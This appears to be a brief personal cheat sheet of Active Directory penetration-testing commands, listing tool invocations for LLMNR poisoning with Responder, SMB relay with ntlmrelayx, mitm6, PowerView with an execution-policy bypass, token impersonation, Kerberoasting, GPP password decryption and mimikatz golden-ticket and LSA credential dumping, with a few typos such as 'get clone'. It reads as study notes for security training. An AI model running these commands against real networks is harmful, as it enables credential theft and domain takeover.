Jul 14, 2024
sudo get clone
to clone the repositorysudo ./pimpmykali.sh
and follow prompts for new VM setupResponder and LLMNR Poisoning
responder -I <interface> -rdwV
SMB Relay
ntlmrelayx
for relayingntlmrelayx.py -tf <targets file> --smb2support
IPv6 Attacks (MITM6)
mitm6 -d <domain>
Power View
powershell.exe -EP Bypass ./powerview.ps1
Bloodhound
apt install bloodhound
Pass-the-Hash and Pass-the-Password
Token Impersonation
list_tokens -u
, impersonate_token <user>
Kerberoasting
getuserspns.py
, HashcatGPP/C-Password Attack
gpp-decrypt <hash>
Golden Ticket Attack
kerberos::golden
, lsadump::lsa /inject
for ntlm hash insight